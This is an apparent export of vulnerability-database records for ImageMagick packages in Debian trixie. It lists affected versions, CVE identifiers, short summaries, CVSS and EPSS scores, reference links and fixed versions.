vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.1.43%252Bdfsg1-1%252Bdeb13u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.16%252Bdfsg1-1%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.18%252Bdfsg1-1%3Fdistro=trixie

url	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
purl	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.19%252Bdfsg1-1%3Fdistro=trixie

aliases CVE-2017-18250

risk_score null

exploitability null

weighted_severity null

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-h8cp-df76-c3dz

url VCID-j6tc-f4fc-mbcv

vulnerability_id VCID-j6tc-f4fc-mbcv

summary ImageMagick: ImageMagick: Denial of Service via deeply nested expression in FX parser

references

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-33902.json

reference_id

reference_type

scores

value	5.5
scoring_system	cvssv3
scoring_elements	CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-33902.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2026-33902

reference_id

reference_type

scores

value	0.00012
scoring_system	epss
scoring_elements	0.01573
published_at	2026-04-16T12:55:00Z

value	0.00012
scoring_system	epss
scoring_elements	0.01634
published_at	2026-04-18T12:55:00Z

value	0.00013
scoring_system	epss
scoring_elements	0.02118
published_at	2026-04-24T12:55:00Z

value	0.00013
scoring_system	epss
scoring_elements	0.0211
published_at	2026-04-26T12:55:00Z

value	0.00013
scoring_system	epss
scoring_elements	0.02151
published_at	2026-04-21T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2026-33902

reference_url	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-33902
reference_id
reference_type
scores
url	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-33902

reference_url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_id

reference_type

scores

value	5.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_url

https://github.com/dlemstra/Magick.NET/releases/tag/14.12.0

reference_id

reference_type

scores

value	5.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

value	MODERATE
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T15:51:18Z/

url

https://github.com/dlemstra/Magick.NET/releases/tag/14.12.0

reference_url

https://github.com/ImageMagick/ImageMagick

reference_id

reference_type

scores

value	5.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://github.com/ImageMagick/ImageMagick

reference_url

https://github.com/ImageMagick/ImageMagick/commit/d3c0a37485314c5ccef72efb18f3847cd53868ba

reference_id

reference_type

scores

value	5.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

value	MODERATE
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T15:51:18Z/

url

https://github.com/ImageMagick/ImageMagick/commit/d3c0a37485314c5ccef72efb18f3847cd53868ba

reference_url

https://github.com/ImageMagick/ImageMagick/releases/tag/7.1.2-19

reference_id

reference_type

scores

value	5.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://github.com/ImageMagick/ImageMagick/releases/tag/7.1.2-19

reference_url

https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-f4qm-vj5j-9xpw

reference_id

reference_type

scores

value	5.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

value	MODERATE
scoring_system	cvssv3.1_qr
scoring_elements

value	MODERATE
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T15:51:18Z/

url

https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-f4qm-vj5j-9xpw

reference_url

https://nvd.nist.gov/vuln/detail/CVE-2026-33902

reference_id

reference_type

scores

value	5.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://nvd.nist.gov/vuln/detail/CVE-2026-33902

reference_url	https://bugzilla.redhat.com/show_bug.cgi?id=2458040
reference_id	2458040
reference_type
scores
url	https://bugzilla.redhat.com/show_bug.cgi?id=2458040

reference_url

https://github.com/advisories/GHSA-f4qm-vj5j-9xpw

reference_id

GHSA-f4qm-vj5j-9xpw

reference_type

scores

value	MODERATE
scoring_system	cvssv3.1_qr
scoring_elements

url

https://github.com/advisories/GHSA-f4qm-vj5j-9xpw

fixed_packages

url	pkg:deb/debian/imagemagick@0?distro=trixie
purl	pkg:deb/debian/imagemagick@0?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@0%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eb4u-x1mt-2uan

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5%3Fdistro=trixie

url	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
purl	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.19%252Bdfsg1-1%3Fdistro=trixie

aliases CVE-2026-33902, GHSA-f4qm-vj5j-9xpw

risk_score 3.1

exploitability 0.5

weighted_severity 6.2

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-j6tc-f4fc-mbcv

url VCID-jn3z-marg-3qgz

vulnerability_id VCID-jn3z-marg-3qgz

summary ImageMagick: direct memory leaks in AcquireMagickMemory because of an error in CLIListOperatorImages in MagickWand/operation.c for a NULL value

references

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-13296.json

reference_id

reference_type

scores

value	3.3
scoring_system	cvssv3
scoring_elements	CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-13296.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2019-13296

reference_id

reference_type

scores

value	0.00458
scoring_system	epss
scoring_elements	0.6406
published_at	2026-04-26T12:55:00Z

value	0.00458
scoring_system	epss
scoring_elements	0.64028
published_at	2026-04-21T12:55:00Z

value	0.00458
scoring_system	epss
scoring_elements	0.64047
published_at	2026-04-24T12:55:00Z

value	0.00467
scoring_system	epss
scoring_elements	0.64414
published_at	2026-04-02T12:55:00Z

value	0.00467
scoring_system	epss
scoring_elements	0.64403
published_at	2026-04-07T12:55:00Z

value	0.00467
scoring_system	epss
scoring_elements	0.64451
published_at	2026-04-08T12:55:00Z

value	0.00467
scoring_system	epss
scoring_elements	0.64467
published_at	2026-04-12T12:55:00Z

value	0.00467
scoring_system	epss
scoring_elements	0.64479
published_at	2026-04-11T12:55:00Z

value	0.00467
scoring_system	epss
scoring_elements	0.64439
published_at	2026-04-13T12:55:00Z

value	0.00467
scoring_system	epss
scoring_elements	0.64473
published_at	2026-04-16T12:55:00Z

value	0.00467
scoring_system	epss
scoring_elements	0.64485
published_at	2026-04-18T12:55:00Z

value	0.00467
scoring_system	epss
scoring_elements	0.6436
published_at	2026-04-01T12:55:00Z

value	0.00467
scoring_system	epss
scoring_elements	0.64443
published_at	2026-04-04T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2019-13296

reference_url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_id

reference_type

scores

value	4
scoring_system	cvssv3
scoring_elements	CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_url	https://bugzilla.redhat.com/show_bug.cgi?id=1730599
reference_id	1730599
reference_type
scores
url	https://bugzilla.redhat.com/show_bug.cgi?id=1730599

fixed_packages

url	pkg:deb/debian/imagemagick@0?distro=trixie
purl	pkg:deb/debian/imagemagick@0?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@0%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eb4u-x1mt-2uan

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.1.43%252Bdfsg1-1%252Bdeb13u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.16%252Bdfsg1-1%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.18%252Bdfsg1-1%3Fdistro=trixie

url	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
purl	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.19%252Bdfsg1-1%3Fdistro=trixie

aliases CVE-2019-13296

risk_score null

exploitability null

weighted_severity null

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-jn3z-marg-3qgz

url VCID-jxwd-tm1k-yqa2

vulnerability_id VCID-jxwd-tm1k-yqa2

summary

Multiple vulnerabilities have been found in ImageMagick, the worst
    of which may allow remote attackers to cause a Denial of Service condition.

references

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2017-13132.json

reference_id

reference_type

scores

value	3.3
scoring_system	cvssv3
scoring_elements	CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2017-13132.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2017-13132

reference_id

reference_type

scores

value	0.00252
scoring_system	epss
scoring_elements	0.48445
published_at	2026-04-01T12:55:00Z

value	0.00252
scoring_system	epss
scoring_elements	0.48482
published_at	2026-04-02T12:55:00Z

value	0.00252
scoring_system	epss
scoring_elements	0.48504
published_at	2026-04-04T12:55:00Z

value	0.00252
scoring_system	epss
scoring_elements	0.48456
published_at	2026-04-07T12:55:00Z

value	0.00252
scoring_system	epss
scoring_elements	0.48511
published_at	2026-04-26T12:55:00Z

value	0.00252
scoring_system	epss
scoring_elements	0.48507
published_at	2026-04-09T12:55:00Z

value	0.00252
scoring_system	epss
scoring_elements	0.48529
published_at	2026-04-11T12:55:00Z

value	0.00252
scoring_system	epss
scoring_elements	0.48502
published_at	2026-04-12T12:55:00Z

value	0.00252
scoring_system	epss
scoring_elements	0.48515
published_at	2026-04-13T12:55:00Z

value	0.00252
scoring_system	epss
scoring_elements	0.48565
published_at	2026-04-16T12:55:00Z

value	0.00252
scoring_system	epss
scoring_elements	0.4856
published_at	2026-04-18T12:55:00Z

value	0.00252
scoring_system	epss
scoring_elements	0.48517
published_at	2026-04-21T12:55:00Z

value	0.00252
scoring_system	epss
scoring_elements	0.485
published_at	2026-04-24T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2017-13132

reference_url	https://bugzilla.redhat.com/show_bug.cgi?id=1486776
reference_id	1486776
reference_type
scores
url	https://bugzilla.redhat.com/show_bug.cgi?id=1486776

reference_url	https://security.gentoo.org/glsa/201711-07
reference_id	GLSA-201711-07
reference_type
scores
url	https://security.gentoo.org/glsa/201711-07

fixed_packages

url	pkg:deb/debian/imagemagick@0?distro=trixie
purl	pkg:deb/debian/imagemagick@0?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@0%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eb4u-x1mt-2uan

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

